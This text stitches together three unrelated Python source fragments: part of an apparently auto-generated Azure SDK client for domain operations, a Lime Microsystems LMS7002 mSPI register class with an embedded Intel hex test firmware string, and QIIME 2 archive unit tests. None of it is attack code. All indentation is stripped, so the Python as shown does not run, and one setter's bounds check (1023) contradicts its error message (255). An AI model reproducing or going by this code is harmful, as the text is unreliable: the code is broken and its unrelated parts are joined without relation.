Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:param domain_ownership_identifier: A JSON representation of the domain ownership properties.
:type domain_ownership_identifier: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
request = build_update_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def renew(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> None:
"""Renew a domain.
Renew a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_renew_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.renew.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204, 400, 500]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
renew.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/renew'} # type: ignore
| |
#***************************************************************
#* Name: LMS7002_mSPI.py
#* Purpose: Class implementing LMS7002 mSPI functions
#* Author: Lime Microsystems ()
#* Created: 2016-11-14
#* Copyright: Lime Microsystems (limemicro.com)
#* License:
#**************************************************************
from LMS7002_base import *
import time
class LMS7002_mSPI(LMS7002_base):
__slots__=[] # Used to generate error on typos
def __init__(self, chip):
self.chip = chip
self.channel = None
self.prefix = "mSPI_"
def getOpCode(self, opCode):
if opCode == "SFR":
return 0x7E
elif opCode == "IRAM_READ":
return 0x78
elif opCode == "RESET_PC":
return 0x70
elif opCode == "RUN_INSTR":
return 0x74
else:
raise ValueError("Unknown MCU opcode :"+str(opCode))
#
# Auxiliary functions
#
def _readHex(self, hexFileName, isString=False):
"""
Read Intel hex file.
Returns a 16384 or 8192 bytes long list containing the MCU program.
"""
if not isString:
inFile = open(hexFileName, 'r')
else:
inFile = hexFileName.split('\n')
ret = [0]*16384
maxAddr = 0
for line in inFile:
line = line.strip()
if line=='':
continue
if line[0]!=':':
raise ValueError("Line does not start with :. Is this an Intel hex file?")
lineData = []
for i in range(1,len(line),2):
lineData.append(int("0x"+line[i:i+2],16))
nBytes = lineData[0]
offset = (lineData[1]<<8) + lineData[2]
recType = lineData[3]
data = lineData[4:4+nBytes]
ckSum = 0
for i in range(0, len(lineData)-1):
ckSum += lineData[i]
ckSum = ~ckSum + 1
ckSum = ckSum%256
if ckSum != lineData[len(lineData)-1]:
raise ValueError("Checksum error in line : "+line)
for i in range(0, len(data)):
if offset+i>maxAddr:
maxAddr = offset+i
ret[offset+i] = data[i]
if not isString:
inFile.close()
if maxAddr<8192:
ret = ret[:8192] # Discard last 8192 bytes, since they are not used
return ret
def loadHex(self, hexFileName, mode='SRAM', isString=False):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
mcuProgram = self._readHex(hexFileName, isString)
self.chip._MCUProgram(mcuProgram, mode)
self.chip.SPIImmediate = immMode
def reset(self):
"""
Put the MCU in reset, and hold it in reset state
"""
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
self.MODE = 'RESET'
self.DEBUG = 0
self.EXT_INT = 0
self.RXD = 0
self.P0 = 0
self.chip.SPIImmediate = immMode
def resetPC(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
ret = self._command([self.getOpCode("RESET_PC")], 1)
self.chip.SPIImmediate = immMode
return ret
def runInstr(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
data = self._command([self.getOpCode("RUN_INSTR"), 0, 0], 3)
self.chip.SPIImmediate = immMode
return data[1]*256+data[2]
def call(self, data):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
self.P0 = 0
if data!=0:
self.SPISW_CTRL = 1
else:
self.SPISW_CTRL = 0
self.P0 = data
self.chip.SPIImmediate = immMode
def waitForMCU(self, timeout=1):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
t0 = time.time()
while time.time()-t0<timeout:
val = self.P1
if val!= 0xFF:
break
if time.time()-t0>timeout:
raise ValueError("Timeout expired in waitForMCU")
self.chip.SPIImmediate = immMode
return val
def startDebugMode(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
self.DEBUG = 1
self.chip.SPIImmediate = immMode
def exitDebugMode(self):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
self.DEBUG = 0
self.chip.SPIImmediate = immMode
def _waitUntilWritten(self, timeout=1):
"""
Waits until WRITE_REQ=1 or timeout expires.
If timeout expires an exception is raised.
"""
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
t0 = time.time()
while (self.WRITE_REQ==1) and (time.time()-t0<timeout):
pass
self.chip.SPIImmediate = immMode
if time.time()-t0>timeout:
raise ValueError("Timeout expired in waitUntilWritten")
def _readOneByte(self, timeout=1):
"""
Waits until READ_REQ=0 or timeout expires.
If timeout expires an exception is raised.
"""
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
t0 = time.time()
while (self.READ_REQ==0) and (time.time()-t0<timeout):
pass
data = self.DFM
self.chip.SPIImmediate = immMode
if time.time()-t0>timeout:
raise ValueError("Timeout expired in readOneByte")
return data
def _command(self, writeData, bytesToReceive):
"""
Writes the data given in writeData list.
Returns bytesToReceive received bytes
"""
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
for data in writeData:
self.DTM = data
self._waitUntilWritten()
recData = []
for i in range(0, bytesToReceive):
recData.append(self._readOneByte())
self.chip.SPIImmediate = immMode
return recData
def _wait(self, n):
immMode = self.chip.SPIImmediate
self.chip.SPIImmediate = True
for i in range(0, n//64):
tmp = self.chip['mSPI_STAT']
self.chip.SPIImmediate = immMode
def changeMCUFrequency(self, value):
self._command( [self.getOpCode("SFR"), 0x8E, value], 3)
def readIRAM(self):
data = [0]*256
opCode = self.getOpCode("IRAM_READ")
for i in range(0,256):
res = self._command( [opCode, i, 0], 3)
data[i] = res[2]
self._wait(64)
return data
#
# mSPI_P0 (0x0000)
#
@property
def P0(self):
"""
Get the value of P0<7:0>
"""
return self._readReg('P0', 'P0<7:0>')
@P0.setter
def P0(self, value):
"""
Set the value of P0<7:0>
"""
if not(0<= value <=1023):
raise ValueError("Value must be [0..255]")
self._writeReg('P0', 'P0<7:0>', value)
#
# mSPI_P1 (0x0001)
#
@property
def P1(self):
"""
Get the value of P1<7:0>
"""
return self._readReg('P1', 'P1<7:0>')
@P1.setter
def P1(self, value):
"""
Set the value of P1<7:0>
"""
if not(0<= value <=255):
raise ValueError("Value must be [0..255]")
self._writeReg('P1', 'P1<7:0>', value)
#
# mSPI_CFG (0x0002)
#
# RXD
@property
def RXD(self):
"""
Get the value of RXD
"""
return self._readReg('CFG', 'RXD')
@RXD.setter
def RXD(self, value):
"""
Set the value of RXD
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('CFG', 'RXD', value)
# DEBUG
@property
def DEBUG(self):
"""
Get the value of DEBUG
"""
return self._readReg('CFG', 'DEBUG')
@DEBUG.setter
def DEBUG(self, value):
"""
Set the value of DEBUG
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('CFG', 'DEBUG', value)
# EXT_INT<5:2>
@property
def EXT_INT(self):
"""
Get the value of EXT_INT<5:2>
"""
return self._readReg('CFG', 'EXT_INT<5:2>')
@EXT_INT.setter
def EXT_INT(self, value):
"""
Set the value of EXT_INT<5:2>
"""
if not(0 <= value <= 15):
raise ValueError("Value must be [0..15]")
self._writeReg('CFG', 'EXT_INT<5:2>', value)
# MODE<1:0>
@property
def MODE(self):
"""
Get the value of MODE<1:0>
"""
return self._readReg('CFG', 'MODE<1:0>')
@MODE.setter
def MODE(self, Mode):
"""
Set the value of MODE<1:0>
"""
if Mode not in [0, 1,2,3, 'RESET', 'EEPROM_AND_SRAM', 'SRAM', 'SRAM_FROM_EEPROM']:
raise ValueError("Mode should be [0, 1,2,3, 'RESET', 'EEPROM_AND_SRAM', 'SRAM', 'SRAM_FROM_EEPROM']")
if Mode==0 or Mode=='RESET':
return
elif Mode==1 or Mode=='EEPROM_AND_SRAM':
mode = 1
elif Mode==2 or Mode=='SRAM':
mode = 2
else:
mode = 3
self._writeReg('CFG', 'MODE<1:0>', mode)
#
# mSPI_STAT (0x0003)
#
# TXD
@property
def TXD(self):
"""
Get the value of TXD
"""
return self._readReg('STAT', 'TXD')
@TXD.setter
def TXD(self, value):
"""
Set the value of TXD
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'TXD', value)
# PROGRAMMED
@property
def PROGRAMMED(self):
"""
Get the value of PROGRAMMED
"""
return self._readReg('STAT', 'PROGRAMMED')
# READ_REQ
@property
def READ_REQ(self):
"""
Get the value of READ_REQ
"""
return self._readReg('STAT', 'READ_REQ')
@READ_REQ.setter
def READ_REQ(self, value):
"""
Set the value of READ_REQ
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'READ_REQ', value)
# WRITE_REQ
@property
def WRITE_REQ(self):
"""
Get the value of WRITE_REQ
"""
return self._readReg('STAT', 'WRITE_REQ')
@WRITE_REQ.setter
def WRITE_REQ(self, value):
"""
Set the value of WRITE_REQ
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'WRITE_REQ', value)
# FULL_WRITE_BUFF
@property
def FULL_WRITE_BUFF(self):
"""
Get the value of FULL_WRITE_BUFF
"""
return self._readReg('STAT', 'FULL_WRITE_BUFF')
@FULL_WRITE_BUFF.setter
def FULL_WRITE_BUFF(self, value):
"""
Set the value of FULL_WRITE_BUFF
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'FULL_WRITE_BUFF', value)
# EMPTY_WRITE_BUFF
@property
def EMPTY_WRITE_BUFF(self):
"""
Get the value of EMPTY_WRITE_BUFF
"""
return self._readReg('STAT', 'EMPTY_WRITE_BUFF')
@EMPTY_WRITE_BUFF.setter
def EMPTY_WRITE_BUFF(self, value):
"""
Set the value of EMPTY_WRITE_BUFF
"""
if value not in [0, 1]:
raise ValueError("Value must be [0,1]")
self._writeReg('STAT', 'EMPTY_WRITE_BUFF', value)
#
# mSPI_DTM (0x0004)
#
@property
def DTM(self):
"""
Get the value of DTM<7:0>
"""
return self._readReg('DTM', 'DTM<7:0>')
@DTM.setter
def DTM(self, value):
"""
Set the value of DTM<7:0>
"""
if not(0<= value <=255):
raise ValueError("Value must be [0..255]")
self._writeReg('DTM', 'DTM<7:0>', value)
#
# mSPI_DFM (0x0005)
#
@property
def DFM(self):
"""
Get the value of DFM<7:0>
"""
return self._readReg('DFM', 'DFM<7:0>')
@DFM.setter
def DFM(self, value):
"""
Set the value of DFM<7:0>
"""
if not(0<= value <=255):
raise ValueError("Value must be [0..255]")
self._writeReg('DFM', 'DFM<7:0>', value)
#
# mSPI_SPISW (0x0006)
#
# SPISW_CTRL
@property
def SPISW_CTRL(self):
"""
Get the value of SPISW_CTRL
"""
return self._readReg('SPISW', 'SPISW_CTRL')
@SPISW_CTRL.setter
def SPISW_CTRL(self, value):
"""
Set the value of SPISW_CTRL
"""
if value not in [0, 1, 'BB', 'MCU']:
raise ValueError("Value must be [0,1]")
if value == 0 or value == 'BB':
val = 0
else:
val = 1
self._writeReg('SPISW', 'SPISW_CTRL', val)
def getProductionTestHex(self):
return """:06000000020041020108AC
:03000B00020412DA
:03001300020120C7
:03001B000204AB31
:030023000207A829
:03002B000207D9F0
:01003300329A
:03003B0002079821
:03009A0002003E23
:03003E0002082194
:20009D00752F7F7582FF75830374A1F074FFE0F530C394A17002C27878FE75BF0374A2F259
:2000BD0074FFE2F531C394A27002C27979FD75BF0374A3F374FFE3F532C394A37002C27A26
:2000DD00750FA4740FF8E6F533C394A47002C27B790E77A5E50EF534C394A57002C27C003D
:2000FD0075EC3575880575A8850022C0E0C0D074A6F535C394A67004C27DC2A80000D0D059
:20011D00D0E032C0E0C0D074A7F536C394A77004C27EC2AA0000D0D0D0E032752F77758CAE
:20013D001F758A52758DFE758BA375891075885075A88A752B07752C070022752F7775ECA0
:20015D0011758CFC758AFC758DFC758BFE75896675885075A88A752B07752C070022752F10
:20017D007775A8A075CAA375CBFE75CCA375CDFE75C80C752D070022752F7775EC11758C48
:20019D00FE758A0A75890175881075A882759800C29FD29E75CA9F75CBFF75CC9F75CDFF74
:2001BD0075C804D2CC752B07752D007599AA0022752F7775EC11758921758CFE758A0A75F7
:2001DD008BF0758DF075878075885075A882759800C29FD29ED29C752C00752B07752D00F7
:2001FD000022752F7775EC1175ED35758CFC758AFE758DFC758BFC7589EE75885075A88AC8
:20021D00752B07752C07752D000022752FFF752B647520007521017522027523037524040A
:20023D00752505752606752707E52B79A0F794647002C2787401C2D3C2D478202879A1F789
:20025D0094217002C279742179242979A2F794457002C27A74457924989979A3F79401708C
:20027D0002C27B7401D2D3C2D47821792526F5F027F5F079A4F794077002C27C74077821B1
:20029D0079259697F5F0C2D3D2D47822792625222526F5F079A5F794097002C27D7409794D
:2002BD0026952297F5F0D2D3D2D478237927262407F5F079A6F7740B7927940397F5F0794B
:2002DD00A7F77401C2D3C2D478237921D3383735253401F5F079A8F7742C782304F5F00894
:2002FD0088F0E8F5F079A9F794247002C27EE521792107E779AAF794027002C27F00227591
:20031D002FFFC2D3C2D4752B0578087508077F0374055F79B0F794017002C27874085679B8
:20033D00B1F794007002C2797409522B532B0FE52B79B2F794017002C27A74014F752B0C4B
:20035D00452B79B3F7940F7002C27B7403464401422BE52B79B4F7940F7002C27C740F68BA
:20037D00652B66640579B5F7940A7002C27D632B05E52B79B6F7940A7002C27E740FF4C439
:20039D002333333333130379B7F794787002C27F0022752FFFD3C3D200C200400679C07770
:2003BD00AAC278B3500679C177AAC279B20000B20010000679C277AAC27A8200B000400613
:2003DD0079C377AAC27B7200400679C477AAC27CC3400679C577AAC27DA000500679C677BF
:2003FD00AAC27ED200A200B3920010000679C777AAC27F0022C0E0C007C000C0D075D00067
:20041D007828B60210E52B2440F8A62B758C1E758AA30080527828B6030AE52B2450F8A602
:20043D002B0080437828B6051CE52B2470F8A62BE52B94007006C2CCC299C2CA758CFE75CA
:20045D008A0A0080227828B60610E52B2480F8A62B758CFE758A0A00800D7828B60708E581
:20047D002B2490F8A62B00782CE6C454F0FF782BE62F782FF6782BE67006C28CC2A9800594
:20049D00782B16D28CD0D0D000D007D0E032C0E0C007C000C0D075D0007828B6020E758D9B
:2004BD00FE758BA3E52C2448F8A62C007828B60308E52C2458F8A62C007828B60708E52C09
:2004DD002498F8A62C00782CE6C454F0FF782BE62F782FF6782CE67006C28EC2AB800578D9
:2004FD002C16D28ED0D0D000D007D0E032752FFF78000874FE48F8740F58F818740F98F841
:20051D00D8027802D3740138C328780668B40006788876AAC27879000974FE49F9740F59F3
:20053D00F919740F99F9D9027902D3740139C329790669B40006788976AAC2797A000A74BE
:20055D00FE4AFA740F5AFA1A740F9AFADA027A02D374013AC32A7A066AB40006788A76AAA7
:20057D00C27A7B000B74FE4BFB740F5BFB1B740F9BFBDB027B02D374013BC32B7B066BB46C
:20059D000006788B76AAC27B7C000C74FE4CFC740F5CFC1C740F9CFCDC027C02D374013CA4
:2005BD00C32C7C066CB40006788C76AAC27C7D000D74FE4DFD740F5DFD1D740F9DFDDD02E9
:2005DD007D02D374013DC32D7D066DB40006788D76AAC27D7E000E74FE4EFE740F5EFE1EB5
:2005FD00740F9EFEDE027E02D374013EC32E7E066EB40006788E76AAC27E7F000F74FE4F87
:20061D00FF740F5FFF1F740F9FFFDF027F02D374013FC32F7F066FB40006788F76AAC27FAC
:20063D0022752FFF74FF75F0FFA4B4010F78B8F6C278E5F0B4FE05C27978B9F674AA75F0C8
:20065D00BBA4B42E0F78BAF6C27AE5F0B47C05C27B78BBF674CC75F099A4B4EC0F78BCF69E
:20067D00C27CE5F0B47905C27D78BDF6740075F0FFA4B4000F78BEF6C27EE5F0B4000578FD
:20069D00BFF6C27F22752FFF74FF75F00184B4FF0F78C8F6C278E5F0B40005C27978C9F6F3
:2006BD0074AA75F00B84B40F0F78CAF6C27AE5F0B40505C27B78CBF674CC75F00984B416C0
:2006DD000F78CCF6C27CE5F0B40605C27D78CDF674FF75F00084B4000F78CEF6C27EE5F0F8
:2006FD00B4000578CFF6C27F22752FFFC340057537A8C278D350037537A8D2002000037567
:20071D0037003000057538A9C27910000375380074AA700375380074006003753800752B9D
:20073D0000B52B037539AA746FB46F05753AABC27A747F7903B90103753A007820752007B1
:20075D00B60705753BACC27B752B01D52B05753CADC27CF180753EAF7801D805753FB0C290
:20077D007DE194740290078673E18BE18E00753C00753DAEC27E2200C27F22C000C0D075EE
:20079D00D00078297601D0D0D00032C0E0C007C000C0D075D000309816782C7600782CE634
:2007BD00C454F0FF782BE62F782FF6C28EC2ACC298C299D0D0D000D007D0E032C0E0C001C3
:2007DD00C000C0D075D000C2CFC2CEE52D2460F8A62D00782D792FE6F7782DE67006C2CA2E
:2007FD00C2AD8003782D16D0D0D000D001D0E03278F0760078F0B6FA00500800000078F056
:20081D000680F1227581D075800F75900075A2FF7591FF75A10778FF74000075880075A915
:20083D000475A880782976007829B601FB7829760078287601782886907828B60F0050E80F
:20085D007828B6010A782E760212009D0209267828B6020A782E7632120138020926782850
:20087D00B6030A782E76321201580209267828B6040A782E763212017B0209267828B605E2
:20089D000A782E76321201950209267828B6060A782E76321201CD0209267828B6070A7866
:2008BD002E76321201FF0209267828B60809782E760212022880527828B60909782E7602E9
:2008DD0012031C80447828B60A09782E76021203AF80367828B60B09782E760212070680DE
:2008FD00287828B60C09782E760212050A801A7828B60D09782E760212063E800C7828B6AD
:20091D000E07782E76021206A2782A7601782A792EC3E796401D12080D75800E12080D7508
:20093D00800F12080D75800D12080D75800F782A0680DA12080D782FE6700A782806782841
:14095D0086900208567828743026F5907828760F020856227A
:06007000E478FFF6D8FD64
:20004E007900E94400601B7A00900975780075A000E493F2A308B8000205A0D9F4DAF275DB
:02006E00A0FFF1
:200076007800E84400600A790075A000E4F309D8FC7800E84400600C7900900000E4F0A38A
:04009600D8FCD9FABF
:0D004100758120120971E582600302003E06
:040971007582002269
:00000001FF
"""
| |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import os
import tempfile
import unittest
import uuid
import zipfile
import pathlib
from qiime2.core.archive import Archiver
from qiime2.core.archive import ImportProvenanceCapture
from qiime2.core.archive.archiver import _ZipArchive
from qiime2.core.archive.format.util import artifact_version
from qiime2.core.testing.format import IntSequenceDirectoryFormat
from qiime2.core.testing.type import IntSequence1
from qiime2.core.testing.util import ArchiveTestingMixin
class TestArchiver(unittest.TestCase, ArchiveTestingMixin):
def setUp(self):
prefix = "qiime2-test-temp-"
self.temp_dir = tempfile.TemporaryDirectory(prefix=prefix)
# Initialize an Archiver. The values passed to the constructor mostly
# don't matter to the Archiver, but we'll pass valid Artifact test data
# anyways in case Archiver's behavior changes in the future.
def data_initializer(data_dir):
fp = os.path.join(str(data_dir), 'ints.txt')
with open(fp, 'w') as fh:
fh.write('1\n')
fh.write('2\n')
fh.write('3\n')
self.archiver = Archiver.from_data(
IntSequence1, IntSequenceDirectoryFormat,
data_initializer=data_initializer,
provenance_capture=ImportProvenanceCapture())
def tearDown(self):
self.temp_dir.cleanup()
def test_save_invalid_filepath(self):
# Empty filepath.
with self.assertRaisesRegex(FileNotFoundError, 'No such file'):
self.archiver.save('')
# Directory.
with self.assertRaisesRegex(IsADirectoryError, 'directory'):
self.archiver.save(self.temp_dir.name)
# Ends with path separator (no basename, e.g. /tmp/foo/).
with self.assertRaises((IsADirectoryError, FileNotFoundError)):
self.archiver.save(os.path.join(self.temp_dir.name, 'foo', ''))
def test_save_excludes_dotfiles_in_data_dir(self):
def data_initializer(data_dir):
data_dir = str(data_dir)
fp = os.path.join(data_dir, 'ints.txt')
with open(fp, 'w') as fh:
fh.write('1\n')
fh.write('2\n')
fh.write('3\n')
hidden_fp = os.path.join(data_dir, '.hidden-file')
with open(hidden_fp, 'w') as fh:
fh.write("You can't see me if I can't see you\n")
hidden_dir = os.path.join(data_dir, '.hidden-dir')
os.mkdir(hidden_dir)
with open(os.path.join(hidden_dir, 'ignored-file'), 'w') as fh:
fh.write("I'm ignored because I live in a hidden dir :(\n")
archiver = Archiver.from_data(
IntSequence1, IntSequenceDirectoryFormat,
data_initializer=data_initializer,
provenance_capture=ImportProvenanceCapture())
fp = os.path.join(self.temp_dir.name, 'archive.zip')
archiver.save(fp)
root_dir = str(archiver.uuid)
expected = {
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
def test_save_archive_members(self):
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
root_dir = str(self.archiver.uuid)
expected = {
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
def test_load_archive(self):
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
archiver = Archiver.load(fp)
self.assertEqual(archiver.uuid, self.archiver.uuid)
self.assertEqual(archiver.type, IntSequence1)
self.assertEqual(archiver.format, IntSequenceDirectoryFormat)
self.assertEqual({str(p.relative_to(archiver.data_dir))
for p in archiver.data_dir.iterdir()},
{'ints.txt'})
def test_load_ignores_root_dotfiles(self):
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
# Add some dotfiles to the archive.
with zipfile.ZipFile(fp, mode='a') as zf:
zf.writestr('.DS_Store', "The world's most beloved file\n")
zf.writestr('.hidden-file',
"You can't see me if I can't see you\n")
zf.writestr('.hidden-dir/ignored-file',
"I'm ignored because I live in a hidden dir :(\n")
# Assert the expected files exist in the archive to verify this test
# case is testing what we want it to.
with zipfile.ZipFile(fp, mode='r') as zf:
root_dir = str(self.archiver.uuid)
expected = {
'.DS_Store',
'.hidden-file',
'.hidden-dir/ignored-file',
'%s/VERSION' % root_dir,
'%s/checksums.md5' % root_dir,
'%s/metadata.yaml' % root_dir,
'%s/data/ints.txt' % root_dir,
'%s/provenance/metadata.yaml' % root_dir,
'%s/provenance/VERSION' % root_dir,
'%s/provenance/citations.bib' % root_dir,
'%s/provenance/action/action.yaml' % root_dir
}
observed = set(zf.namelist())
# Not using self.assertArchiveMembers() because it accepts paths
# relative to root_dir, and we have extra paths at the same level
# as root_dir.
self.assertEqual(observed, expected)
archiver = Archiver.load(fp)
self.assertEqual(archiver.uuid, self.archiver.uuid)
self.assertEqual(archiver.type, IntSequence1)
self.assertEqual(archiver.format, IntSequenceDirectoryFormat)
self.assertEqual({str(p.relative_to(archiver.data_dir))
for p in archiver.data_dir.iterdir()},
{'ints.txt'})
def test_load_ignores_directory_members(self):
# Directory members aren't created by Python's zipfile module but can
# be present if the archive is unzipped and then rezipped, for example,
# using a command-line zip program.
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
# Add directory entries to the archive.
root_dir = str(self.archiver.uuid)
with zipfile.ZipFile(fp, mode='a') as zf:
zf.writestr('%s/' % root_dir, "")
zf.writestr('%s/data/' % root_dir, "")
zf.writestr('%s/data/nested/' % root_dir, "")
zf.writestr('%s/data/nested/foo.txt' % root_dir, "bar")
# Assert the expected files exist in the archive to verify this test
# case is testing what we want it to.
expected = {
'', # Expected path: `root_dir`/
'data/',
'data/nested/',
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'data/nested/foo.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
archiver = Archiver.load(fp)
self.assertEqual(archiver.uuid, self.archiver.uuid)
self.assertEqual(archiver.type, IntSequence1)
self.assertEqual(archiver.format, IntSequenceDirectoryFormat)
archiver.save(fp)
root_dir = str(archiver.uuid)
expected = {
# Directory entries should not be present.
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'data/nested/foo.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
def test_load_empty_archive(self):
fp = os.path.join(self.temp_dir.name, 'empty.zip')
with zipfile.ZipFile(fp, mode='w') as zf:
pass
with zipfile.ZipFile(fp, mode='r') as zf:
expected = set()
observed = set(zf.namelist())
self.assertEqual(observed, expected)
with self.assertRaisesRegex(ValueError, 'visible root directory'):
Archiver.load(fp)
def test_load_dotfile_only_archive(self):
fp = os.path.join(self.temp_dir.name, 'dotfiles-only.zip')
with zipfile.ZipFile(fp, mode='w') as zf:
zf.writestr('.DS_Store', "The world's most beloved file\n")
zf.writestr('.hidden-file',
"You can't see me if I can't see you\n")
zf.writestr('.hidden-dir/ignored-file',
"I'm ignored because I live in a hidden dir :(\n")
with zipfile.ZipFile(fp, mode='r') as zf:
expected = {
'.DS_Store',
'.hidden-file',
'.hidden-dir/ignored-file'
}
observed = set(zf.namelist())
self.assertEqual(observed, expected)
with self.assertRaisesRegex(ValueError, 'visible root directory'):
Archiver.load(fp)
def test_load_multiple_root_dirs(self):
fp = os.path.join(self.temp_dir.name, 'multiple-root-dirs.zip')
self.archiver.save(fp)
# Add another semi-valid root dir.
second_root_dir = str(uuid.uuid4())
with zipfile.ZipFile(fp, mode='a') as zf:
zf.writestr('%s/VERSION' % second_root_dir, "foo")
with zipfile.ZipFile(fp, mode='r') as zf:
root_dir = str(self.archiver.uuid)
expected = {
'%s/VERSION' % root_dir,
'%s/checksums.md5' % root_dir,
'%s/metadata.yaml' % root_dir,
'%s/data/ints.txt' % root_dir,
'%s/provenance/metadata.yaml' % root_dir,
'%s/provenance/VERSION' % root_dir,
'%s/provenance/citations.bib' % root_dir,
'%s/provenance/action/action.yaml' % root_dir,
'%s/VERSION' % second_root_dir
}
observed = set(zf.namelist())
self.assertEqual(observed, expected)
with self.assertRaisesRegex(ValueError, 'multiple root directories'):
Archiver.load(fp)
def test_load_invalid_uuid4_root_dir(self):
fp = pathlib.Path(self.temp_dir.name) / 'invalid-uuid4'
zp = pathlib.Path(self.temp_dir.name) / 'bad.zip'
fp.mkdir()
# Invalid uuid4 taken from https://gist.github.com/ShawnMilo/7777304
root_dir = '89eb3586-8a82-47a4-c911-758a62601cf7'
record = _ZipArchive.setup(fp, 'foo', 'bar')
(fp / str(record.uuid)).rename(fp / root_dir)
_ZipArchive.save(fp, zp)
with self.assertRaisesRegex(ValueError,
'root directory.*valid version 4 UUID'):
_ZipArchive(zp)
def test_is_uuid4_valid(self):
uuid_str = str(uuid.uuid4())
self.assertTrue(_ZipArchive._is_uuid4(uuid_str))
def test_parse_uuid_invalid(self):
# Invalid uuid4 taken from https://gist.github.com/ShawnMilo/7777304
uuid_str = '89eb3586-8a82-47a4-c911-758a62601cf7'
self.assertFalse(_ZipArchive._is_uuid4(uuid_str))
# Not a UUID.
uuid_str = 'abc123'
self.assertFalse(_ZipArchive._is_uuid4(uuid_str))
# Other UUID versions.
for uuid_ in (uuid.uuid1(), uuid.uuid3(uuid.NAMESPACE_DNS, 'foo'),
uuid.uuid5(uuid.NAMESPACE_DNS, 'bar')):
uuid_str = str(uuid_)
